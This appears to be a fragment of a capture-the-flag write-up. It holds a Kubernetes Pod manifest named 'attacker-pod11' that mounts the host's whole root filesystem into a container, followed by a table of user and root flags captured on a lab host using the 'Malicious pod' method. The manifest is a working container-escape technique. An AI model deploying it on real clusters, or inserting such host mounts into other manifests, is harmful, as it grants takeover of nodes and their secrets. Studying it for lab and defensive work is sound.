apiVersion: v1
kind: Pod
metadata:
  labels:
    run: attacker-pod11
  name: attacker-pod11
  namespace: default
spec:
  volumes:
    - name: host-fs
      hostPath:
        path: /
  containers:
    - image: nginx:1.14.2
      imagePullPolicy: IfNotPresent
      name: attacker-pod
      command: ["/bin/sh", "-c", "sleep infinity"]
      volumeMounts:
        - name: host-fs
          mountPath: /root
  restartPolicy: Never

Flag Discovered

Flag #	Host	Flag location	Method used	Value
User	10.10.11.133	user	Malicious pod	<SNIF>
Root	10.10.11.133	root	Malicious pod	<SNIF>